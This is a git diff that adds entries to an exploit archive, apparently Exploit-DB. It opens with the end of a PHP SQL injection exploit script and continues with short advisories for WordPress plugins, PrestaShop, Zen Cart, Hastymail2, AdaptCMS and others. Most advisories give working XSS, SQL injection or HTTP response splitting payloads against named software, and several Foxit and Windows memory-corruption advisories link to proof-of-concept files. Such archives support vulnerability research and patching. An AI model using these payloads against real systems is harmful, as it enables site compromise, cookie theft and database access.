+$packet .= "Host: {$host}\r\n";
+$packet .= "Connection: close\r\n\r\n";
+
+   print "[+] Performing SQL Injection Attack\n";
+   sleep(2);
+   
+$response1=http_send($host, $packet);
+
+preg_match('/::(.*)::/', $response1, $m) ? print "\n$m[1]\n" : die("\n[-] Exploit failed!\n");
+
+################################################################################################################
+# Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
+################################################################################################################
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/36338.txt b/platforms/php/webapps/36338.txt
new file mode 100755
index 000000000..b19a43537
--- /dev/null
+++ b/platforms/php/webapps/36338.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50778/info
+
+ClickDesk Live Support plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+ClickDesk Live Support 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=[xss] 
\ No newline at end of file
diff --git a/platforms/php/webapps/36339.txt b/platforms/php/webapps/36339.txt
new file mode 100755
index 000000000..127b86dad
--- /dev/null
+++ b/platforms/php/webapps/36339.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/50779/info
+
+Featurific For WordPress plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Featurific For WordPress 1.6.2 is vulnerable; other versions may also be affected.
+
+UPDATE April 18, 2012: Further reports indicate this issue may not be a vulnerability; the issue can not be exploited as described. 
+
+http://www.example.com/[path]/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=[xss] 
\ No newline at end of file
diff --git a/platforms/php/webapps/36340.txt b/platforms/php/webapps/36340.txt
new file mode 100755
index 000000000..ec6fe7256
--- /dev/null
+++ b/platforms/php/webapps/36340.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50783/info
+
+Newsletter Meenews Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Newsletter Meenews 5.1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/wp-content/plugins/meenews/newsletter.php?idnews=[xss] 
\ No newline at end of file
diff --git a/platforms/php/webapps/36341.txt b/platforms/php/webapps/36341.txt
new file mode 100755
index 000000000..666b961b6
--- /dev/null
+++ b/platforms/php/webapps/36341.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/50784/info
+
+PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected. 
+
+GET: http://<app_base>/modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php
+POST: num_mode=<script>alert(&#039;XSS&#039;)</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/36342.txt b/platforms/php/webapps/36342.txt
new file mode 100755
index 000000000..570697b4f
--- /dev/null
+++ b/platforms/php/webapps/36342.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/50784/info
+ 
+PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ 
+PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/modules/mondialrelay/googlemap.php?relativ_base_dir=>&#039;);alert(&#039;XSS&#039;);
+http://www.example.com/modules/mondialrelay/googlemap.php?relativ_base_dir=">&#039;);alert(&#039;XSS&#039;);
+http://<app_base>/modules/mondialrelay/googlemap.php?Pays=&#039;);alert(&#039;XSS&#039;);
\ No newline at end of file
diff --git a/platforms/php/webapps/36343.txt b/platforms/php/webapps/36343.txt
new file mode 100755
index 000000000..bb314cf56
--- /dev/null
+++ b/platforms/php/webapps/36343.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/50784/info
+  
+PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  
+PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected. 
+
+GET: http://<app_base>/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php
+POST: Expedition=<script>alert(&#039;XSS&#039;)</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/36344.txt b/platforms/php/webapps/36344.txt
new file mode 100755
index 000000000..98a5bf0c3
--- /dev/null
+++ b/platforms/php/webapps/36344.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/50784/info
+   
+PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+   
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+   
+PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected. 
+
+GET: http://<app_base>/admin/ajaxfilemanager/ajax_save_text.php
+POST: folder=<script>alert(&#039;XSS 1&#039;);</script>&name=<script>alert(&#039;XSS 2&#039;);</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/36345.txt b/platforms/php/webapps/36345.txt
new file mode 100755
index 000000000..20eb85094
--- /dev/null
+++ b/platforms/php/webapps/36345.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/50785/info
+
+Prestashop is prone to an HTTP-response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid various attacks that try to entice client users into a false sense of trust.
+
+Prestashop 1 4.4.1 is vulnerable; other versions may also be affected. 
+
+GET: http://www.example.com/admin/displayImage.php?img=<name_of_existing_file_in_md5_format>&name=asa.cmd"%0d%0a%0d%0a@echo off%0d%0aecho running batch file%0d%0apause%0d%0aexit
+Note: The <name_of_existing_file_in_md5_format> is the name of one file existing on the "upload/" folder. It&#039;s name must be a MD5 hash, without any extension. ex: "435ed7e9f07f740abf511a62c00eef6e" 
diff --git a/platforms/php/webapps/36346.txt b/platforms/php/webapps/36346.txt
new file mode 100755
index 000000000..1ac6f167b
--- /dev/null
+++ b/platforms/php/webapps/36346.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/50787/info
+
+Zen Cart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Zen Cart 1.3.9h is vulnerable; other versions may also be affected. 
+
+GET: https://www.example.com/index.php?main_page=gv_send&action=send
+POST: message=&lt;/textarea&gt;<script>alert("XSS");</script><textarea> 
+
+line 72: echo &#039;<br /><strong>TESTING INFO:</strong> Time page: <strong>&#039; . $_GET[&#039;main_page&#039;] . &#039;</strong> was loaded is: <strong>&#039; . date(&#039;H:i:s&#039;, time()) . &#039;</strong><br /><br />&#039;;
+...
+line 75: echo "GLOBALS[$main_page] and HTTP_GET_VARS[&#039;main_page&#039;] and _GET[&#039;main_page&#039;] = " . $GLOBALS[&#039;main_page&#039;] . &#039; - &#039; . $HTTP_GET_VARS[&#039;main_page&#039;] . &#039; - &#039; . $_GET[&#039;main_page&#039;] . &#039;<br /><br />&#039;;
+...
+line 76: echo "_SERVER[&#039;PHP_SELF&#039;] and _GET[&#039;PHP_SELF&#039;] and PHP_SELF and _SESSION[&#039;PHP_SELF&#039;] = " . $_SERVER[&#039;PHP_SELF&#039;] . &#039; - &#039; . $_GET[&#039;PHP_SELF&#039;] . &#039; - &#039; . $PHP_SELF . &#039; - &#039; . $_SESSION[&#039;PHP_SELF&#039;] . &#039;<br /><br />&#039;; 
\ No newline at end of file
diff --git a/platforms/php/webapps/36347.txt b/platforms/php/webapps/36347.txt
new file mode 100755
index 000000000..470a84708
--- /dev/null
+++ b/platforms/php/webapps/36347.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/50789/info
+
+Hastymail2 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Hastymail2 2.1.1 is vulnerable; other versions may also be affected. 
+
+GET: http://<app_base>/index.php?page=mailbox&mailbox=Drafts
+POST: rs=<script>alert(&#039;xss&#039;)</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/36348.txt b/platforms/php/webapps/36348.txt
new file mode 100755
index 000000000..d58257ddf
--- /dev/null
+++ b/platforms/php/webapps/36348.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50794/info
+
+Pro Clan Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Pro Clan Manager 0.4.2 is vulnerable; other versions may also be affected.
+
+notarealuser%00'+union+select+1;# 
\ No newline at end of file
diff --git a/platforms/php/webapps/36349.txt b/platforms/php/webapps/36349.txt
new file mode 100755
index 000000000..4e4c4fdcb
--- /dev/null
+++ b/platforms/php/webapps/36349.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/50795/info
+
+AdaptCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+AdaptCMS 2.0.0 and 2.0.1 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/article/'66/Blog/AdaptCMS-20-March-26th
+http://www.example.com/article/'75/News/AdaptCMS-200-Released
+http://www.example.com/article/'293/Album/Pink-Floyd-Animals
+http://www.example.com/article/'294/News/AdaptCMS-202-Update 
\ No newline at end of file
diff --git a/platforms/php/webapps/36350.txt b/platforms/php/webapps/36350.txt
new file mode 100755
index 000000000..f50c5e8c6
--- /dev/null
+++ b/platforms/php/webapps/36350.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50797/info
+
+CMS Balitbang is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+http://www.example.com/<CMS Balitbang Installation Path>/index.php?id=lih_buku&hal='[SQL] 
\ No newline at end of file
diff --git a/platforms/php/webapps/36351.txt b/platforms/php/webapps/36351.txt
new file mode 100755
index 000000000..337a14d60
--- /dev/null
+++ b/platforms/php/webapps/36351.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50797/info
+ 
+CMS Balitbang is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query.
+ 
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+ 
+http://www.example.com/<CMS Balitbang Installation Path>/alumni.php?id=data&tahun&hal='[SQL] 
diff --git a/platforms/windows/dos/36334.txt b/platforms/windows/dos/36334.txt
new file mode 100755
index 000000000..fdc3fb1c8
--- /dev/null
+++ b/platforms/windows/dos/36334.txt
@@ -0,0 +1,69 @@
+#####################################################################################
+
+Application:   Foxit Products GIF Conversion Memory Corruption Vulnerabilities (LZWMinimumCodeSize)
+
+Platforms:   Windows
+
+Versions:   The vulnerability is confirmed in version Foxit Reader 7.x. Other versions may also be affected.
+
+Secunia:   SA63346
+
+{PRL}:   2015-01
+
+Author:   Francis Provencher (Protek Research Lab’s)
+
+Website:   http://www.protekresearchlab.com/
+
+Twitter:   @ProtekResearch
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+ 
+
+Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing.
+
+(http://en.wikipedia.org/wiki/Foxit_Reader)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2015-02-17: Francis Provencher from Protek Research Lab’s found the issue;
+2015-02-21: Foxit Security Response Team confirmed the issue;
+2015-02-21: Foxit fixed the issue;
+2015-03-09: Foxit released fixed version of Foxit Reader 7.1/Foxit Enterprise Reader 7.1/Foxit PhantomPDF7.1.
+
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+An error when handling LZWMinimumCodeSize can be exploited to cause memory corruption via a specially crafted GIF file.
+
+#####################################################################################
+
+===========
+
+4) POC
+
+===========
+
+http://protekresearchlab.com/exploits/PRL-2015-01.gif
+http://www.exploit-db.com/sploits/36334.gif
+
+
+###############################################################################
\ No newline at end of file
diff --git a/platforms/windows/dos/36335.txt b/platforms/windows/dos/36335.txt
new file mode 100755
index 000000000..e831937b3
--- /dev/null
+++ b/platforms/windows/dos/36335.txt
@@ -0,0 +1,68 @@
+#####################################################################################
+
+Application:   Foxit Products GIF Conversion Memory Corruption Vulnerabilities (DataSubBlock)
+
+Platforms:   Windows
+
+Versions:   The vulnerability is confirmed in version Foxit Reader 7.x. Other versions may also be affected.
+
+Secunia:   SA63346
+
+{PRL}:   2015-02
+
+Author:   Francis Provencher (Protek Research Lab’s)
+
+Website:   http://www.protekresearchlab.com/
+
+Twitter:   @ProtekResearch
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+ 
+
+Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing.
+
+(http://en.wikipedia.org/wiki/Foxit_Reader)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2015-01-22: Francis Provencher from Protek Research Lab’s found the issue;
+2015-01-28: Foxit Security Response Team confirmed the issue;
+2015-01-28: Foxit fixed the issue;
+2015-03-09: Foxit released fixed version of Foxit Reader 7.1/Foxit Enterprise Reader 7.1/Foxit PhantomPDF7.1.
+
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+An error when handling the Size member of a GIF DataSubBlock data structure can be exploited to cause memory corruption via a specially crafted GIF file.
+
+#####################################################################################
+
+===========
+
+4) POC
+
+===========
+
+http://protekresearchlab.com/exploits/PRL-2015-02.gif
+http://www.exploit-db.com/sploits/36335.gif
+
+###############################################################################
diff --git a/platforms/windows/dos/36336.txt b/platforms/windows/dos/36336.txt
new file mode 100755
index 000000000..e723b7fec
--- /dev/null
+++ b/platforms/windows/dos/36336.txt
@@ -0,0 +1,73 @@
+#####################################################################################
+
+Application:   Microsoft Windows Text Services memory corruption.
+
+Platforms:   Windows
+
+Versions:   list.
+
+Microsoft: MS15-020
+
+Secunia:   SA63220
+
+{PRL}:   2015-03
+
+Author:   Francis Provencher (Protek Research Lab’s)
+
+Website:   http://www.protekresearchlab.com/
+
+Twitter:   @ProtekResearch
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+ 
+
+Microsoft Corporation  is an American multinational corporation headquartered in Redmond, Washington, that develops, manufactures, licenses, supports and sells computer software, consumer electronics and personal computers and services. Its best known software products are the Microsoft Windowsline of operating systems, Microsoft Office office suite, and Internet Explorer web browser. Its flagship hardware products are the Xbox game consoles and the Microsoft Surface tablet lineup. It is the world’s largest software maker measured by revenues.[5]It is also one of the world’s most valuable companies.[6]
+
+(http://en.wikipedia.org/wiki/Microsoft)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2015-02-08: Francis Provencher from Protek Research Lab’s found the issue;
+2015-03-04: MSRC confirmed the issue;
+2015-03-10: Microsoft fixed the issue;
+2015-03-10: Microsoft release a Patch for this issue.
+
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+An unspecified error in Windows Text Services can be exploited to cause memory corruption..
+
+#####################################################################################
+
+===========
+
+4) POC
+
+===========
+
+This file need to be open in wordpad.
+
+http://protekresearchlab.com/exploits/PRL-2015-03.rar
+http://www.exploit-db.com/sploits/36336.rar
+
+###############################################################################
+Search for: